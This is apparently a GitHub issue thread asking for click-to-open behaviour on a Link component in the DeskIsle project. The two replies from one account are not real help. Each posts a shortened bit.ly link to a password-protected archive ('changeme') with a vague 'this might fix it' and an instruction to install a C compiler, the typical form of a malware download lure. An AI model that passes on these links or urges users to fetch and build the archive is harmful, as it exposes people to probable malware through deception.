### ISSUE TITLE
Feature Request: Click Functionality for Link Component

### ISSUE THREAD

**Issue by KeyonYan** [DeskIsle/DeskIsle#3]
# What problem does this feature solve?
The Link component can be clicked to navigate to the corresponding website or open desktop applications, without affecting the layout drag and drop.
Link组件点击可以跳转对应网址或打开桌面程序，同时不影响布局拖拽。

**Comment by Kevin-Otalvares** [comment]
maybe this will help
https://bit.ly/3TC7hrw
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Kevin-Otalvares** [comment]
This might help:This file might fix it
https://bit.ly/4gvtdhO

Password: changeme
If you don't have the c compliator, install it.(gcc or clang)
